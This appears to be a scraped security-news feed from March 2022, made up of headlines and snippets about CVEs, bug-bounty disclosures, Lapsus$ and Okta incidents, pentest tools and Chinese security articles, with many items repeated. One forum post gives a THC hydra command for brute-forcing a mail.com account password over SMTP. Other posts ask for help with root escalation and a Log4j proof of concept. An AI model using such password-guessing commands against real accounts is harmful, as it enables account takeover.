    submitted by /u/MiguelHzBz [link] [comments]
    RTLO Injection URI Spoofing CVE-2020-20093; 20094; 20095; 20096... chilling in plain sight for 3 years 👀 — iMessage, WhatsApp, Instagram, and Facebook Messenger. Telegram patched earlier & Signal fixing today!
    submitted by /u/docker-osx [link] [comments]
    Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)
    submitted by /u/stypr [link] [comments]
    Red Canary's 2022 Threat Detection Report
    submitted by /u/tvjust [link] [comments]
    Splunk Patches Indexer Vulnerability Discovered By Team82
    submitted by /u/n0llbyte [link] [comments]
    What to look for when reviewing a company's infrastructure
    submitted by /u/okram87 [link] [comments]
    Video - SSH Phishing attack on FIDO protected ssh keys
    submitted by /u/ssh-mitm [link] [comments]
    Heap Overflow in OpenBSD's slaacd via Router Advertisement
    submitted by /u/Gallus [link] [comments]
  • Open

    Found a useful Tools and Programs list for Digital Forensics
    submitted by /u/Khaotic_Kernel [link] [comments]
  • Open

    The Mystery Admin User
    One of our clients recently submitted a malware removal request with a curious problem: A mystery admin user kept getting re-created on their website. Try as they might, nothing they did would get rid of this user; it just kept coming back. A suspicious “user” that just won’t go away… It was suspiciously generic, named simply “user” and had no name, content, or email attached to it. Continue reading The Mystery Admin User at Sucuri Blog.
  • Open

    Hacking Wordpress, DC 6 from Vulnhub
    https://youtu.be/aJ52gTHzzKQ submitted by /u/luzunov [link] [comments]
  • Open

    Dual North Korean hacking efforts found attacking Google Chrome vulnerability
    Article URL: https://www.cyberscoop.com/north-korea-hackers-google-dream-job/ Comments URL: https://news.ycombinator.com/item?id=30805937 Points: 2 # Comments: 0
    Vulnerability in Honda's Remote Keyless System
    Article URL: https://github.com/nonamecoder/CVE-2022-27254 Comments URL: https://news.ycombinator.com/item?id=30804702 Points: 428 # Comments: 189
  • Open

    SecWiki News 2022-03-25 Review
    全球高级持续性威胁(APT)2021年度报告 by ourren Lapsus$组织攻击微软的手法以及几点启示 by ourren 预测功能性漏洞利用 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-25 Review
    全球高级持续性威胁(APT)2021年度报告 by ourren Lapsus$组织攻击微软的手法以及几点启示 by ourren 预测功能性漏洞利用 by ourren 更多最新文章,请访问SecWiki
  • Open

    Misconfigured Rate Limit at app.sign.plus/forgot_password
    Alohi disclosed a bug submitted by shamim_12__: https://hackerone.com/reports/1472394
    F5 BIG-IP TMUI RCE - CVE-2020-5902 (.packet8.net)
    8x8 disclosed a bug submitted by remonsec: https://hackerone.com/reports/1519841
    Business Logic Flaw in the subscription of the app
    Dragon disclosed a bug submitted by engr-naseem1: https://hackerone.com/reports/1505189 - Bounty: $250
    Broken link hijacking in https://kubernetes-csi.github.io/docs/drivers.html?highlight=chubaofs#production-drivers
    Kubernetes disclosed a bug submitted by 0xlegendkiller: https://hackerone.com/reports/1466889 - Bounty: $100
  • Open

    About
    Hi! I’m hahwul. I like doing various things about hacking, security and all the technique of computer science. “hahwul” is a new word made by remixing my name, and it means me. pronunciation is a little vague. say ‘ha-hul’ but you can just call me ‘howl’ If you have any other questions please feel free to contact me (@hahwul). 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 package main type Me struct { Job string Pronouns string SpecialMove string MainWeapon string Language []string } func main() { me := &Me{ Job: "🗡 Security engineer and Red team that aims for a purple team.
    Security Crawl Maze와 ZAP
    이번달 초 쯤이였나요? ZAP의 메인 개발자인 Simon이 이런 트윗을 남겼었습니다. Anyone able to recommend any open source tools that are good at crawling modern web apps? Out of the box rather than toolkits. Apart from @zaproxy I’m looking for comparisons 😁 제가 아는 선에선 ZAP과 Burpsuite의 Spider/Crawler가 가장 좋다고 느꼈기 때문에 ZAP과 Burpsuite를 이야기 했었는데요. 문뜩 이 때 ZAP이 Spidering을 개선할 것 같은 느낌이 들었었습니다. 시간이 좀 지난 후 ZAP은 StackHawk ZAP Fund를 통해 오래된 버그들에 대한 버그바운티(우리가 아는 버그바운티랑 약간 달라요.
  • Open

    CTF Writeup: VishwaCTF 2022
    This is my writeup for the VishwaCTF 2022, which includes OSINT, Misc, Forensics, Cryptography challenges. Continue reading on Medium »
    L’espion Walkthrough — Cyberdefenders
    Challenge Link: L’espion Continue reading on Medium »
    Ukraine — Point de situation au 25 mars
    Les dernières 24h Continue reading on Medium »
    OSINT TOOLS
    WHAT TOOLS DO YOU NEED TO KNOW? Continue reading on Medium »
  • Open

    Plenty of learning material for technicians
    https://edu.anarcho-copy.org/ submitted by /u/Appropriate-You-6065 [link] [comments]
  • Open

    How Token Misconfiguration can lead to takeover account
    this has been moved to Continue reading on Medium »
    Solution to my $20 egg hunt (Part 2)
    This is part 2 of my tutorial on how to solve my $20 egg hunt. This post should help you towards the end of this challenge… Continue reading on Medium »
  • Open

    hackmyvm系列1——hotle
    本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
    《网络安全审查办法》演绎版 (第二期)
    《网络安全审查办法》生动演绎版,快来学习吧。
    《网络安全审查办法》演绎版 (第一期)
    《网络安全审查办法》演绎版 ,快来学习吧。
    美国指控 4 名俄罗斯政府雇员从事黑客活动
    美国政府指控四名俄罗斯政府雇员,参与对全球能源领域数百家公司和组织的网络攻击活动。
    来检测带外(Out-of-Band)流量的Ceye
    Goby 基于 FOFA 平台丰富的指纹库基础上,可以快速高效对目标网络环境进行资产探测。
    FBI:2021年网络犯罪带来的损失高达69亿美元
    和2020年相比,2021年不论是报告的数量还是损失的金额都有明显地增加,其中金额增加了20多亿美元,接近二分之一,令人感到无比惊讶。
    FreeBuf周报 | Lapsus$勒索组织入侵微软源代码存储库;黑客使用新的 Rootkit 攻击银行ATM
    3月21日晚,Lapsus$ 公开了从微软 Azure DevOps 服务器窃取的 37GB 源代码,这些源代码适用于各种内部 Microsoft 项目,包括 Bing、Cortana 和 Bing 地图。
    FreeBuf甲方群话题讨论 | 公有云、私有云还是混合云?聊聊企业云端化安全建设
    近年来,企业上云似乎成为必然趋势,但企业该如何科学、高效上云,如何选择云端化产品,成为企业数字化发展中不得不面临的问题。
    Java RMI漏洞利用技术浅析
    RMI是由JDK自带提供的一套远程方法调用框架,用于实现跨JVM间的方法调用。
    Anonymous声称已入侵俄罗斯央行
    国际知名黑客组织“匿名者”(Anonymous)日前他们声称已经侵入了俄罗斯中央银行。
    “盘一盘”近期疯狂作案的 Lapsus $ 黑客组织
    “长江后浪推前浪,一代更比一代强”,嚣张的黑客组织 Lapsus $。
    伦敦警方逮捕7名Lapsus$ 团伙嫌疑人,16岁少年被怀疑是头目之一
    这7名嫌疑人年龄从16-21岁不等,目前警方已将其释放,但调查工作仍在继续。
  • Open

    基于 OpenAFS 文件系统的反射攻击深度分析
    作者:百度安全实验室 原文链接:https://mp.weixin.qq.com/s/CIAdpOoxQ-ARwitVmTxX7Q 0x00概述 百度智云盾团队在2022年3月首次捕获到利用OpenAFS服务的反射放大攻击。据现有资料表明,这种反射攻击方式尚属全网首次出现,智云盾系统在2秒内识别攻击,实时对流量做了隔离和清洗,保障用户免遭DDoS的伤害。 经过深入分析,我们确认了本次攻击是黑...
  • Open

    基于 OpenAFS 文件系统的反射攻击深度分析
    作者:百度安全实验室 原文链接:https://mp.weixin.qq.com/s/CIAdpOoxQ-ARwitVmTxX7Q 0x00概述 百度智云盾团队在2022年3月首次捕获到利用OpenAFS服务的反射放大攻击。据现有资料表明,这种反射攻击方式尚属全网首次出现,智云盾系统在2秒内识别攻击,实时对流量做了隔离和清洗,保障用户免遭DDoS的伤害。 经过深入分析,我们确认了本次攻击是黑...
  • Open

    Need help with hydra syntax
    Hi I was wondering if someone could give me some help with something in THC hydra. I will start by saying I am new to this so if the answer is easy and obvious sorry. I want to make sure that the syntax I am using here is correct based off the current version (9.3) . I am trying to crack the password for this mail.com email address (This is my friends account, we are practicing together) This is the syntax I am using (This is not the real account obviously) hydra -1 suchandsuch@mail.com -x 8:12:aA1 smpts://smtp.mail.com I want the password to include upper case and lowercase as well as number. I also would like for symbols to be included and I don't know the character for that. Lastly I am not sure if the last part is correct? Thank you in advance for any help you can provide I greatly appreciate it. submitted by /u/jigentsu [link] [comments]
  • Open

    Windows Event Log Evasion Review
    Before I kick this blog post off, I'd like to thank Lina L for her excellent work in developing and sharing her work, both on Twitter, as well as in a blog post. Both are thoughtful, cogent, and articulate. In her blog post, Lina references detection techniques, something that is extremely important for all analysts to understand. What Lina is alluding to is the need for analysts to truly understand their tools, and how they work. Back around 2007-ish, the team I was on had several members (myself included) certified to work PCI forensic investigations. Our primary tool at the time for scanning acquired images and data for credit card numbers (CCNs) was EnCase (at the time, a Guidance Software product)...I believe version 6.19 or thereabouts. We had a case where JCB and Discover cards were…

  • Open

    Tetanus - Mythic C2 Agent written in Rust
    submitted by /u/hackerbby [link] [comments]
    Countering threats from North Korea
    submitted by /u/dmchell [link] [comments]
    The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en
    submitted by /u/dmchell [link] [comments]
    Log4j CVE-2021-44228
    Hi all! I'm making an assignment for my university which consists in executing a pentest on a docker. By scanning with nessus I found a Log4j vulnerability and I'm trying to get the PoC of it. I searched on the web but I didn't find any interesting info about how to do that. Anyone has got some ideas? According to nessus, it seems to be related to LDAP service. (vulnerability got found on tcp port 80) https://preview.redd.it/m4vk6psk6bp81.png?width=1345&format=png&auto=webp&s=6d0e5541c4aa627f4c610943d185342a7c269909 submitted by /u/_1NiCk1_ [link] [comments]
  • Open

    21 Best Kali Linux Tools for Hacking and Penetration Testing
    There are several types of tools that comes pre-installed. If you do not find a tool installed, simply download it and set it up. It’s… Continue reading on Medium »
    You need to know this ZAP/Burp trick if you do mobile testing
    Did you know you can use multiple proxies in burp and zap? Continue reading on System Weakness »
    You need to know this ZAP/Burp trick if you do mobile testing
    Did you know you can use multiple proxies in burp and zap? Continue reading on Medium »
    FRUSTRATED FROM BUG HUNTING WHEN YOU CAN’T FIND BUG
    HELLO READERS , Continue reading on Medium »
    One Month Bug Bounty Journey Update
    My goal with this is to explain some of my thoughts and how they changed as I progressed and how I modified my path along the way. For we… Continue reading on Medium »
    Instagram and Facebook Account Takeover if another user account is logged into your system/mobile
    Hi, I'm Praveen Kumar, let's start with how we can take complete takeover and access to other Facebook and Instagram accounts if it's… Continue reading on Medium »
    Hacking Security Ebooks
    👉Comment on any broken links or requests for books. 👉Follow me on Twitter:https://twitter.com/root_babu 👉Follow me on… Continue reading on Medium »
    A curated list of various bug bounty tools
    Contents Continue reading on Medium »
    Information Gathering: Concept, Techniques and Tools explained
    Information Gathering means gathering different kinds of information about the target. It is basically, the first step or the beginning… Continue reading on Medium »
    Facebook bug bounty: Part- 1 Expectation vs Reality
    I have already written some reports on bugreader you can check here. Continue reading on Medium »
    What “if” I can get more reward?
    An imcomplete if logic that leads to a catastrophic loss. Continue reading on Medium »
  • Open

    Impersonation of tiktok account via Broken Link in TikTok Newsroom
    TikTok disclosed a bug submitted by bushidobrown200: https://hackerone.com/reports/1504294
    Time-of-check to time-of-use vulnerability in the std::fs::remove_dir_all() function of the Rust standard library
    Internet Bug Bounty disclosed a bug submitted by hkratz: https://hackerone.com/reports/1520931 - Bounty: $4000
    Improper Authentication via previous backup code login
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1485788 - Bounty: $250
  • Open

    Does disabling an account remove the Account Authorization?
    A small team at work is going through NIST 800-53 Rev5 to map our work policies and procedures to NIST frameworks, identifying gaps and proposing changes. We did this with NIST CSF last year and found it useful, so we are now continuing on with 800-53. Currently, a coworker and I have a debate that I am going to lose, but would like to see if anyone smarter than me can provide a solid rebuttal. Here is the setup. We are determining if policy related to disabling or deleting an account maps to this control: AC-2d.3. Access authorizations (i.e., privileges) and [Assignment: organization-defined attributes (as required)] for each account; My argument is: Disabling an account disables the ability to authenticate to the account, but does not remove the previous authorization to the account. If someone subsequently enabled the account, the authorization would already exist, as its authorization did not change. Thus, policy around disabling an account is not considered for AC-2d.3. Deleting an account removes the account from the identity directory, which would also remove it from any authorizations associated with that account (assuming, of course, you have properly authorized the account using a tool that would also remove that authorization). Creating a new account with the same authorization would require authorizing the new account with the same authorization as the deleted account. Thus, policy around deleting an account is considered for AC-2d.3. My coworker says they have an argument for me that has worked with auditors. I have a week to find a rebuttal that will hold water. submitted by /u/dmburl [link] [comments]
    MacOS Trustd and China
    Apologies in advance - this is a double post (I originally posted it in the macOS community and someone suggested I post it here as well). I have Little Snitch (LS) running on my M1 MacBook Pro. Periodically, I will check the LS Network Monitor to see where traffic is going. Today, I noticed that there were 4 connections to mainland China and all were trustd\apple.com\ocsp2.apple.com What is interesting to me is: I also have a separate (with the gear symbol) trustd\apple.com\oscp2.apple.com connecting to locations in the US. I've never had trustd connecting to China. Anyone else, not based in China, have Little Snitch and can check to see if they have connections going to China with trustd? Little Snitch shows one of the China trustd IP addresses as: 110.188.2.1. The organisation owning this IP address is China Telecom Sichuan. The other 3 are: 111.43.160.66 112.92.99.203 120.240.74.66 The US based trustd IP addresses are mostly 17.253.127.xxx, which are Apple owned (I think). FYI - per Little Snitch: "Trust Daemon" is a macOS system process that is responsible for evaluating the validity of digital certificates that are used for encryption and security features. "trustd" connects to the servers of several certificate authorities to evaluate the validity of digital certificates. If you deny these connections apps on your computer may not be able to connect to serves on the Internet. submitted by /u/idid2reddit [link] [comments]
    Open Source API Security Tools
    Looking to add protections for web application APIs. Are there any good Open source API security tools? submitted by /u/Calm_Scene [link] [comments]
    Trying to bypass this sudoers file thing, need help!
    https://ibb.co/1byT2pm I'm just learned about dirty pipe vulnerability but unable to get root access albeit this machine is vulnerable to dirty pipe but the guy who set up this machine has removed user from sudoers file, even more, I'm not able to edit sudoers file idk why, Does anyone have any idea about how to bypass this filter and get root access by privilege escalation? Pls help submitted by /u/The_Intellectualist [link] [comments]
    Meta-Sploit ILITIES
    I am scanning a website with nmap, I get this type of output: https://vulners.com/metasploit/MSF:ILITIES/blahblah/blahblah but there is no ILITIES module? I tried googling it and I got nothing. Anyone has any tips/solutions? submitted by /u/NSA-cat [link] [comments]
  • Open

    A quick reminder: Don't stress on both threat and vulnerability
    Article URL: https://techkettle.blogspot.com/2022/03/a-quick-reminder-dont-stress-on-both.html Comments URL: https://news.ycombinator.com/item?id=30795327 Points: 1 # Comments: 0
  • Open

    Threat Brief: Lapsus$ Group
    The Lapsus$ Group grew from launching a handful of destructive attacks to stealing and publishing source code of top-tier technology companies. The post Threat Brief: Lapsus$ Group appeared first on Unit42.
    2022 Unit 42 Ransomware Threat Report Highlights: Ransomware Remains a Headliner
    2022 Unit 42 Ransomware Threat Report highlights include average ransom demands and payments and new developments in double extortion and RaaS. The post 2022 Unit 42 Ransomware Threat Report Highlights: Ransomware Remains a Headliner appeared first on Unit42.
  • Open

    Another vulnerability in the LPC55S69 ROM
    submitted by /u/mckirk_ [link] [comments]
    Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
    submitted by /u/digicat [link] [comments]
    CVE-2022-24415, CVE-2022-24416, CVE-2022-24419, CVE-2022-24420, CVE-2022-24421 : New Dell BIOS Bugs Affect Millions of Inspiron, Vostro, XPS, Alienware Systems
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Lateral Movement: WebClient Workstation Takeover
    Introduction The article is based on @tifkin_’s idea that a workstation takeover, also known as lateral movement, is possible by abusing WebDAV shares. In Certified The post Lateral Movement: WebClient Workstation Takeover appeared first on Hacking Articles.
    Lateral Movement: WebClient Workstation Takeover
    Introduction The article is based on @tifkin_’s idea that a workstation takeover, also known as lateral movement, is possible by abusing WebDAV shares. In Certified The post Lateral Movement: WebClient Workstation Takeover appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-03-24 Review
    OpenCTI入门笔记(一):搭建框架和导入数据 by ourren 基于LSTM的二进制代码相似性检测 by ourren 漏洞情报:为什么、要什么和怎么做 by ourren 浅谈模糊测试基础技术——引导机制 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-24 Review
    OpenCTI入门笔记(一):搭建框架和导入数据 by ourren 基于LSTM的二进制代码相似性检测 by ourren 漏洞情报:为什么、要什么和怎么做 by ourren 浅谈模糊测试基础技术——引导机制 by ourren 更多最新文章,请访问SecWiki
  • Open

    is it possible to scan a smart assistant such as an alexa or google home for evidence
    hi im writing a paper on forensic acquisition of smart assistants and i was wondering is there any way to scan and view files from an alexa submitted by /u/bradfordranger5 [link] [comments]
  • Open

    Medium > LinkedIn
    Imma post interesting things about the Ten Million Dollar Home Page (xmdhp.com) here. Follow me to the top. I ❤️ Medium. Continue reading on Medium »
  • Open

    4月8日 | FreeBuf云安全主题公开课开启报名
    4月8日FreeBuf云安全主题公开课开启报名,来看看有哪些心动课程吧!
    FBI提醒美国能源公司警惕来自俄罗斯的网络攻击
    FBI日前对美国能源公司发出警告,称与俄罗斯相关的攻击者可能正针对其部署网络攻击。
    零信任威胁隔离防护 让企业更贴近安全合规监管
    党的十八大以来,党中央高度重视网络安全和信息化工作。
    FreeBuf早报 | 欧盟警告卫星通信网络恐受威胁;乌克兰企业遭受DoubleZero攻击
    安全研究公司 ASEC 发现网络上近期出现了一种新的恶意软件大肆传播,它会伪装成以 Windows 激活工具的形式,但实际上是 BitRAT 远程访问木马。
    全球超过200,000台MicroTik路由器受到僵尸网络恶意软件的控制
    近期,专家表示受僵尸网络控制的MicroTik路由器是他们近年来看到的最大的网络犯罪活动之一。
    中央网信办等12部门联合印发IPv6技术创新和融合应用试点名单
    通知指出,经地方和相关部门组织推荐、专家评审及复核、网上公示等程序,确定了22个综合试点城市和96个试点项目。
    黑吃黑!黑客通过推送虚假恶意软件从同行手中窃取信息
    两家安全公司的分析师发现黑客间的“黑吃黑”行为,黑客通过伪装成破解 RAT 和恶意软件构建工具的剪贴板窃取器来攻击其他黑客。
    俄罗斯认为 Google News 发布虚假战争信息,限制其在境内运行
    俄罗斯禁止该国互联网访问 Alphabet 新闻聚合服务 Google News。
  • Open

    U.S Army Launches the Cyber Military Intelligence Group (CMIG)
    The U.S Army has recently announced the development and public launch of the Cyber Military Intelligence Group (CMIG) which aims to use both proprietary sources including public sources on its way to build situational awareness in the world of cyber warfare and malicious and fraudulent adversaries.An excerpt:"The CMIG’s function is to direct, synchronize and coordinate intelligence support to
    Israel Blocks Ukraine From Purchasing Pegasus Spyware
    According to the Guardian Israel blocked Ukraine from purchasing the Pegasus spyware from the infamous NSO Group vendor of lawful surveillance hacking tools.Not surprisingly this is a bit over-exaggerated and self-serving statement that actually does more PR harm other than good despite the fact that the article is mentioning Israel's "2007 Defense Export Control Act" which prevents the country
    Assessing the U.S Intelligence Community's Annual Threat Report for 2022
    In the most recently released "U.S Intelligence Community's Annual Threat Report for 2022" the U.S Intelligence Community states that China remains the U.S's most sophisticated and relevant cyber adversary which possesses the necessary sophistication to target the country both using cyber espionage and attacks against U.S critical infrastructure.An excerpt:"We assess that China presents the
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-21225(九)
    作者:Hcamael@知道创宇404实验室 时间:2022年03月16日 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(...
    利用 gateway-api 攻击 kubernetes
    作者:lazydog 原文链接:http://noahblog.360.cn/abuse-gateway-api-attack-kubernetes/ 前言 前几天注意到了 istio 官方公告,有一个利用 kubernetes gateway api 仅有 CREATE 权限来完成特权提升的漏洞(CVE-2022-21701),看公告、diff patch 也没看出什么名堂来,跟着自己感觉...
    Clipper 恶意软件伪装成 AvD 加密盗窃器
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/ 盗取信息的恶意软件正在增多。Cyble 研究实验室最近在一个网络犯罪论坛上发现了一个名为“ AvD crypto stealer”的新恶意软件。然而,经过进一步的调查,我们观察到这并不是一个加密盗窃软件。实际上,这是一个伪装的著...
    RealWorld CTF 之 qiling 框架分析
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org qiling 当时题目就给了一个qiling的使用的用例,甚至和官方文档上面的用例差不多因此肯定是库的问题。 #!/usr/bin/env python3 import os import sys import base64 import ...
    容器进程切换思考
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前置技术 Magic Link /proc/目录下存在很多的链接文件,但是在Linux 也存在一种特殊的链接文件,这种文件的大小为0,我们知道普通的链接文件的大小等于链接目标的文件路径长度,但是Magic Link的大小为0,它们在打开方式上...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-21225(九)
    作者:Hcamael@知道创宇404实验室 时间:2022年03月16日 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(...
    利用 gateway-api 攻击 kubernetes
    作者:lazydog 原文链接:http://noahblog.360.cn/abuse-gateway-api-attack-kubernetes/ 前言 前几天注意到了 istio 官方公告,有一个利用 kubernetes gateway api 仅有 CREATE 权限来完成特权提升的漏洞(CVE-2022-21701),看公告、diff patch 也没看出什么名堂来,跟着自己感觉...
    Clipper 恶意软件伪装成 AvD 加密盗窃器
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/ 盗取信息的恶意软件正在增多。Cyble 研究实验室最近在一个网络犯罪论坛上发现了一个名为“ AvD crypto stealer”的新恶意软件。然而,经过进一步的调查,我们观察到这并不是一个加密盗窃软件。实际上,这是一个伪装的著...
    RealWorld CTF 之 qiling 框架分析
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org qiling 当时题目就给了一个qiling的使用的用例,甚至和官方文档上面的用例差不多因此肯定是库的问题。 #!/usr/bin/env python3 import os import sys import base64 import ...
    容器进程切换思考
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前置技术 Magic Link /proc/目录下存在很多的链接文件,但是在Linux 也存在一种特殊的链接文件,这种文件的大小为0,我们知道普通的链接文件的大小等于链接目标的文件路径长度,但是Magic Link的大小为0,它们在打开方式上...

  • Open

    Nessus + Pivot Tables
    Hello All, I'm a new security analyst at my firm. I've been introduced to Nessus and tasked with vulnerability management. I'm utilizing Excel pivot tables to organize the tremendous amounts of data. Currently, in the pivot table section for filters, I've input 'Risk' and under rows I have 'Solution & Host.' I then use Xlookup to match each host against a server list of administrators. This gives me the person to contact for the specific vulnerability. My question is how are you setting up your pivot tables? Thank you, R2G submitted by /u/Red2Green [link] [comments]
    Best app for wifi security assessments using an iphone
    I recently made the switch to Apple from Samsung (S9+ and S22+). Too many issues with Samsung right now. I am looking for replacement apps that can be used on Iphone. Wifi collector https://play.google.com/store/apps/details?id=net.nirsoft.wificollector Network Scanner https://play.google.com/store/apps/details?id=com.myprog.netscan NetworkMapper https://github.com/kost/networkmapper (basically nmap) ​ I know that there may not be a one for one but I am looking for recommendations on what people are using on the iPhone front. Yes, I have looked in the apple store but would to hear from people. Sorry is this broke a rule. submitted by /u/Quickbreach [link] [comments]
    How to approach Burp Suite academy and certification
    Hello folks, I currently study web vulnerabilities on Burp Suite academy with the next opportunity to pass the certification exam as well as gain skills and understanding for OWASP TOP 10 vulnerabilities testing for the future job. The question is how to make notes that helped me in the job/certification exam? I literally copy the whole page text to my Obsidian editor... Just don't want to lose some information that causes me to misunderstand something. It is like a whole Burp Academy website in my Obsidian, just without pictures, this probably makes no sense as I can not find or define needed information for vulns finding and exploitation. (just a bunch of info: what vulnerability is about, how it impact a business, types of vulns, etc. ) I want to make like cheatsheet for myself based on the content regarding vulnerabilities identification/testing/exploitation, that helps me in an exam environment and the real world. Any tips are appreciated, thank you in advance. submitted by /u/TRYH0 [link] [comments]
    The best Netsec field for freelancing ?
    What would be the best field in cybersecurity to specialize in for someone who wants to work as a freelance ? Thank you for your input and have a wonderful day submitted by /u/No-Lead497 [link] [comments]
    Knowing what website leaves the 2FA cookie to know what to keep.
    There are various websites sites that use 2FA, and I think do not need the 2FA email if the remember-this-computer cookie has been saved. I delete most cookies, but I keep ones that I list for the purpose. In chrome I use Cookie AutoDelete. My question is, how do I know what website leaves the cookie that I want to save. It presumably is not the domain of my financial institution, because I retain those cookies when trying to do this. ​ I wish I could tell what cookie(s) got introduced after doing the 2FA entering of the code. Then I would know what cookie domain to save. I cannot figure it out for any of my browsers -- Chrome, Edge, FireFox, Avast, and even Internet Explorer. Any guidance for me? Thanks. ​ This thread is somewhat related, but not quite. submitted by /u/Apt_ferret [link] [comments]
    Any introductory links on how to build rules for untangle NG Firewall?
    Hello there.... Noob here looking for tips/links on how to build rules for untangle NG Firewall. I have installed the untangle Firewall and as it seems I am missing something obvious and can't wrap my head around creating the FW rules suitably for my network. I started off by blocking everything as the "last" rule and by allowing stuff that seemed obvious to me as the earlier layers of rules. However, there seems to be a lot of traffic on funny ports by my zoo of different equipment (cameras, mobile devices, cleaning robot, etc.) for example in the port 5xxx range. Therefore, I have tried to search for some help for noobs on how to evaluate what's there and what's essential to keep open beyont the 80/443 TCP and 53 UDP range but haven't been able to identify something like the condensed notes of rule-creation. Need to recon what's there and don't seem to be able to identify it. I'd be absolutely thrilled, if anyone could let me know if they have a link on how to start creating suitable rules for a small SOHO network: I have no VLANs or DMZ Firewall lives between router and a Ubiquiti managed switch two AP by Ubiquiti connected to the managed switch several computers (Linux, Mac, Win10), two printers, several mobile devices, cams, vacuum-cleaner-robot on the network, SONOS EVE home appliances messaging apps (Whatsapp, Signal Telegram, Threema,... ) in use, email with different providers Need no HTTP/HTTPS traffic enter my network from the outside VPN on an uncommon port no uPNP outside the SOHO network So it doesn't seem to be a big issue technically, but I might be mistaken. Any pointer is highly appreciated! submitted by /u/azarot5555 [link] [comments]
    Emails I didn't send in my sent folder?
    Apologies if this is the wrong sub for this, if there's a better place please let me know. I found this in my "sent" folder on gmail, but I don't know where it came from. I did click on a gmail suggested "unsubscribe" link recently, like in the third pic (not that exact one, I don't remember which or when). I don't imagine clicking such a link would send an email like that. Searching for the address it was sent to in my email just brings the pictured email up. Anyone have an idea of what's going on here? Images: https://slack-files.com/TBEMPBASH-F0385DN63QV-ac613bd467 https://slack-files.com/TBEMPBASH-F0381LD0CNS-2eb1d038e6 https://slack-files.com/TBEMPBASH-F0385E6J6UV-68e5bc7aa6 submitted by /u/pissing_on_the_lawn [link] [comments]
    Sniffing packets through hotspot
    If a laptop provides hotspot for another device, how can we inspect the traffic of connected device on the laptop? If wireshark is the answer then what interface should be selected? The wifi interface is having too many redundant packets from other devices too. Please share your suggestions. submitted by /u/Fantastic_Sperm [link] [comments]
    What data formats are vulnerable to batching attacks outside of graphql?
    Batching attacks is basically where you can put multiple user and pass params in the same request with different values and the server can check them all bypassing rate limits and lockout policies. What im wondering is what other technologies or data formats by their very implementation also allows for this behavior outside of graphql. I believe old SOAP apis can support batch requests encapsulated in the xml. Another is potentially multipart form data type request although I never tested if batching is possible on thes. submitted by /u/Academic-Discount252 [link] [comments]
  • Open

    Ukraine — Point de situation au 24 mars
    Les dernières 24h Continue reading on Medium »
    Biały wywiad OSINT — sposób na pozyskiwanie danych z sieci
    Co to jest biały wywiad? Czy przedsiębiorca lub pracownik firmy może go samodzielnie przeprowadzić? Biały wywiad OSINT polega na zbieraniu… Continue reading on Blog Transparent Data »
    OSINT Methodology and Tradecraft: Tips for Winning The Trace Labs Black Badge from Team Federal…
    INTRODUCTION Continue reading on Medium »
  • Open

    TrustedSec Okta Breach Recommendations
    TrustedSec’s Incident Response Team sent urgent communications to all IR retainer clients after the discovery of the compromise of Okta. Below are the recommendations provided with additional updates after reviewing more information on 03/23/2022. On March 22, 2022, the threat group LAPSUS$ announced a successful compromise of Okta, a heavily used identity and access management... The post TrustedSec Okta Breach Recommendations appeared first on TrustedSec.
  • Open

    Proxy: Accessing Network Connection
    No content preview
    The mystery of SQLMap’s --eval
    No content preview
    Authentication bypass using root array
    No content preview
  • Open

    Proxy: Accessing Network Connection
    No content preview
    The mystery of SQLMap’s --eval
    No content preview
    Authentication bypass using root array
    No content preview
  • Open

    Proxy: Accessing Network Connection
    No content preview
    The mystery of SQLMap’s --eval
    No content preview
    Authentication bypass using root array
    No content preview
  • Open

    I've heard someone here might be interested in virus(ransomware) samples. I'd like to know what this is or what to do about it.
    submitted by /u/TarnaBar [link] [comments]
    Large-scale npm attack targets Azure developers with malicious packages
    submitted by /u/SRMish3 [link] [comments]
    GitHub - Developers Support Ukraine
    submitted by /u/ssh-mitm [link] [comments]
    LTrack: Stealthy Tracking of Mobile Phones in LTE
    submitted by /u/rbarkley [link] [comments]
    Microsoft: DEV-0537 (LAPSUS$) criminal actor targeting organizations for data exfiltration and destruction
    submitted by /u/momothereal [link] [comments]
  • Open

    A Detailed Guide on Crunch
    Introduction Often times attackers have the need to generate a wordlist based on certain criteria which are required for pentest scenarios like password spraying/brute-forcing. Other The post A Detailed Guide on Crunch appeared first on Hacking Articles.
    A Detailed Guide on Crunch
    Introduction Often times attackers have the need to generate a wordlist based on certain criteria which are required for pentest scenarios like password spraying/brute-forcing. Other The post A Detailed Guide on Crunch appeared first on Hacking Articles.
  • Open

    What if…
    … Your IdP is breached Continue reading on Neuvik »
